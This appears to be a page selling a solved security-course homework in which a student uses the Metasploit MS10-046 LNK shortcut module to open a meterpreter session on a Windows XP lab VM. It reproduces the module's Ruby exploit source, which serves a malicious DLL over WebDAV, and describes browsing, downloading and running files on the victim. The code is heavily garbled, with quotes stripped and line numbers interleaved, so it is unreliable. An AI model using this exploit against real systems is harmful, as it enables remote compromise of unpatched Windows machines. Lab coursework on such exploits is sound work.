[SOLVED] Excel solution

$25

File Name: Excel_solution.zip
File Size: 131.88 KB

5/5 - (1 vote)

solution

Homework #3
In this homework you will pick a metasploit module and demonstrate how to use it to gain
access to your WinXP VM instance. You should use the ONL topology for this homework.

In class, we used the ms_03_026_dcom module; you must choose a different one for this
homework. Similarly, the Metasploit Unleashed tutorial uses ms08_067_netapi; so that one
cannot be used either. Other than these constraints, you are free to choose any module so long
as you are able to demonstrate that it can be used to (at a minimum) open a meterpreter
session on your WinXP VM instance.

For your write-up and turn-in document, make a copy of this document, rename it to hw3-
notes, and move it into your CSE 523 Google Docs collection. Use this document to complete
the homework, using the space provided below.

You are to complete this homework on your own. Do not ask (or answer) questions of other
students; do not discuss any aspect of this homework with any other student. Direct all
questions to the TAs or me.

Your complete homework should include the following.

An annotated transcript illustrating how to use your module of choice; include at least one
screenshot at the end to demonstrate that it worked. Your transcript should be clear and
easy for someone to reproduce; you can assume that a reader has the same
Ubuntu/WinXP setup that you do. Your annotated transcript should be as easy to follow as
exploring-msploit-notes. (You do not need to include gates.)
Identify and briefly describe the vulnerability that is being exploited with this module. Add
links to the appropriate CVE and MS bulletins.
Find the ruby source code for the exploit module. Include both the URL to the source file
at github and a copy of the ruby source code in your write-up.
Your writeup should be organized and well-written, with proper grammar and spelling.

Do not change anything above this line. Add your homework write-up below it.

Exploit Steps

Open msfconsole

https://github.com/rapid7/metasploit-framework

Exploit settings

I set module ms10_046_shortcut_icon_dllloader as the exploit to be used. Then set
reverse_tcp as the payload.

This module will start a web server. We need to specify the server host ip address using
SRVHOST . Then I also set the metasploit execution host LHOST . And use show options to

check the settings.

Exploit

Use exploit command to conduct the exploit.

After executing exploit command, the server starts. When the client accesses the url, the
server will send the client malicious DLL.

Access URL in the winxp

In the winxp vm, open the IE, input the url and press Enter key.

Open Meterpreter Session

When the victim client accesses the url, the server sends the malicious DLL to the client that
creates the WebDAV service. The exploit is successful and it opens a meterpreter session.

Start Interaction with the meterpreter session

Now we can access the winxp system in my meterpreter session. The following shows that I cd
to C: directory, list files in the directory and read the content in info.txt .

The following shows that I can download the file and start a program.

Vulnerability Discussion

This module exploits vulnerability described in this link
https://www.symantec.com/security_response/vulnerability.jsp?bid=41732. In summary, this
module creates a shortcut link that points to a malicious DLL. The winxp system has
vulnerability that allows the file to automatically run which let the module to run the payload.

Modulce Source Code

https://github.com/rapid7/metasploit-
framework/blob/master/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloade
r.rb

##

# This module requires Metasploit: https://metasploit.com/download

1

2

https://www.symantec.com/security_response/vulnerability.jsp?bid=41732.
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, Name => Microsoft Windows Shell LNK Code

Execution,

Description => %q{

This module exploits a vulnerability in the handling of

Windows

Shortcut files (.LNK) that contain an icon resource pointing to

a

malicious DLL. This module creates a WebDAV service that can be

used

to run an arbitrary payload when accessed as a UNC path.

},

Author =>

[

hdm, # Module itself

jduck, # WebDAV implementation, UNCHOST var

B_H # Clean LNK template

],

License => MSF_LICENSE,

References =>

[

[CVE, 2010-2568],

[OSVDB, 66387],

[MSB, MS10-046],

[URL,

http://www.microsoft.com/technet/security/advisory/2286198.mspx]

],

DefaultOptions =>

{

EXITFUNC => process,

},

Payload =>

{

Space => 2048,

},

Platform => win,

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

Targets =>

[

[ Automatic, { } ]

],

DisclosureDate => Jul 16 2010,

DefaultTarget => 0))

register_options(

[

OptPort.new( SRVPORT, [ true, The daemon port to

listen on (do not change), 80 ]),

OptString.new( URIPATH, [ true, The URI to use (do

not change)., / ]),

OptString.new( UNCHOST, [ false, The host portion of

the UNC path to provide to clients (ex: 1.2.3.4). ])

])

deregister_options(SSL, SSLVersion) # Just for now

end

def on_request_uri(cli, request)

case request.method

when OPTIONS

process_options(cli, request)

when PROPFIND

process_propfind(cli, request)

when GET

process_get(cli, request)

else

print_error(Unexpected request method encountered: #

{request.method})

resp = create_response(404, Not Found)

resp.body =

resp[Content-Type] = text/html

cli.send_response(resp)

end

end

def process_get(cli, request)

myhost = (datastore[SRVHOST] == 0.0.0.0) ?

Rex::Socket.source_address(cli.peerhost) : datastore[SRVHOST]

webdav = \\#{myhost}\

if (request.uri =~ /.dll$/i)

print_status Sending DLL payload

return if ((p = regenerate_payload(cli)) == nil)

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

data = generate_payload_dll({ :code => p.encoded })

send_response(cli, data, { Content-Type => application/octet-

stream })

return

end

if (request.uri =~ /.lnk$/i)

print_status Sending LNK file

send_response(cli, data, { Content-Type => application/octet-

stream })

return

end

print_status Sending UNC redirect

resp = create_response(200, OK)

resp.body = %Q||

resp[Content-Type] = text/html

cli.send_response(resp)

end

#

# OPTIONS requests sent by the WebDav Mini-Redirector

#

def process_options(cli, request)

print_status(Responding to WebDAV OPTIONS request)

headers = {

MS-Author-Via => DAV,

# DASL => ,

# DAV => 1, 2,

Allow => OPTIONS, GET, PROPFIND,

Public => OPTIONS, GET, PROPFIND

}

resp = create_response(207, Multi-Status)

resp.body =

resp[Content-Type] = text/xml

cli.send_response(resp)

end

#

# PROPFIND requests sent by the WebDav Mini-Redirector

#

def process_propfind(cli, request)

path = request.uri

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

print_status(Received WebDAV PROPFIND request for #{path})

body =

my_host = (datastore[SRVHOST] == 0.0.0.0) ?

Rex::Socket.source_address(cli.peerhost) : datastore[SRVHOST]

my_uri = http://#{my_host}/

if path =~ /.dll$/i

# Response for the DLL

print_status(Sending DLL multistatus for #{path} )

body = %Q|

#{path}#{@exploit_dll}

2010-07-19T20:29:42Z

#{rand(0x100000)+128000}

Mon, 19 Jul 2010 20:29:42

GMT

#{%.16x % rand(0x100000000)}

T

application/octet-stream

HTTP/1.1 200 OK

|

resp = create_response(207, Multi-Status)

resp.body = body

resp[Content-Type] = text/xml

cli.send_response(resp)

return

end

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

if path =~ /.lnk$/i

# Response for the DLL

print_status(Sending DLL multistatus for #{path} )

body = %Q|

#{path}#{@exploit_lnk}

2010-07-19T20:29:42Z

#{rand(0x100)+128}

Mon, 19 Jul 2010 20:29:42

GMT

#{%.16x % rand(0x100000000)}

T

shortcut

HTTP/1.1 200 OK

|

resp = create_response(207, Multi-Status)

resp.body = body

resp[Content-Type] = text/xml

cli.send_response(resp)

return

end

if path !~ //$/

if path.index(.)

print_status(Sending 404 for #{path} )

resp = create_response(404, Not Found)

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

resp[Content-Type] = text/html

cli.send_response(resp)

return

else

print_status(Sending 301 for #{path} )

resp = create_response(301, Moved)

resp[Location] = path + /

resp[Content-Type] = text/html

cli.send_response(resp)

return

end

end

print_status(Sending directory multistatus for #{path} )

body = %Q|

#{path}

2010-07-19T20:29:42Z

Mon, 19 Jul 2010 20:29:42

GMT

#{%.16x % rand(0x100000000)}

httpd/unix-directory

HTTP/1.1 200 OK

|

subdirectory = %Q|

#{path}#{Rex::Text.rand_text_alpha(6)}/

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

2010-07-19T20:29:42Z

Mon, 19 Jul 2010 20:29:42

GMT

#{%.16x % rand(0x100000000)}

httpd/unix-directory

HTTP/1.1 200 OK

|

files = %Q|

#{path}#{@exploit_dll}

2010-07-19T20:29:42Z

#{rand(0x100000)+128000}

Mon, 19 Jul 2010 20:29:42

GMT

#{%.16x % rand(0x100000000)}

T

application/octet-stream

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

HTTP/1.1 200 OK

#{path}#{@exploit_lnk}

2010-07-19T20:29:42Z

#{rand(0x100)+128}

Mon, 19 Jul 2010 20:29:42

GMT

#{%.16x % rand(0x100000000)}

T

shortcut

HTTP/1.1 200 OK

|

if request[Depth].to_i > 0

if path.scan(/).length < 2 body << subdirectory else body << files end end body <<

body.gsub!(/t/, )

# send the response

resp = create_response(207, Multi-Status)

resp.body = body

resp[Content-Type] = text/xml; charset=utf8

cli.send_response(resp)

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

end

def generate_link(unc)

uni_unc = unc.unpack(C*).pack(v*)

path =

path << [ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack(C*) path << uni_unc # LinkHeader ret = [ 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack(C*) idlist_data = idlist_data << [0x12 + 2].pack(v) idlist_data << [ 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack(C*) idlist_data << [0x12 + 2].pack(v) idlist_data << [ 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack(C*) idlist_data << [path.length + 2].pack(v) idlist_data << path idlist_data << [0x00].pack(v) # TERMINAL WOO # LinkTargetIDList ret << [idlist_data.length].pack(v) # IDListSize ret << idlist_data # ExtraData blocks (none) ret << [rand(4)].pack(V) 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 # Patch in the LinkFlags ret[0x14, 4] = [10000001000000000000000000000000.to_i(2)].pack(N) ret end def exploit unc = \\ if (datastore[UNCHOST]) unc << datastore[UNCHOST].dup else unc << ((datastore[SRVHOST] == 0.0.0.0) ? Rex::Socket.source_address(50.50.50.50) : datastore[SRVHOST]) end unc << \ unc << rand_text_alpha(rand(8)+4) unc << \ @exploit_unc = unc @exploit_lnk = rand_text_alpha(rand(8)+4) + .lnk @exploit_dll = rand_text_alpha(rand(8)+4) + .dll if datastore[SRVPORT].to_i != 80 || datastore[URIPATH] != / fail_with(Failure::Unknown, Using WebDAV requires SRVPORT=80 and URIPATH=/) end print_status(Send vulnerable clients to #{@exploit_unc}.) print_status(Or, get clients to save and render the icon of http:///.lnk)

super

end

end

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

428

429

430

431

432

433

434

435

436

437

438

439

440

441

442

443

Homework #3
Exploit Steps
Open msfconsole
Exploit settings
Exploit
Access URL in the winxp
Open Meterpreter Session
Start Interaction with the meterpreter session

Vulnerability Discussion
Modulce Source Code

Reviews

There are no reviews yet.

Only logged in customers who have purchased this product may leave a review.

Shopping Cart
[SOLVED] Excel solution
$25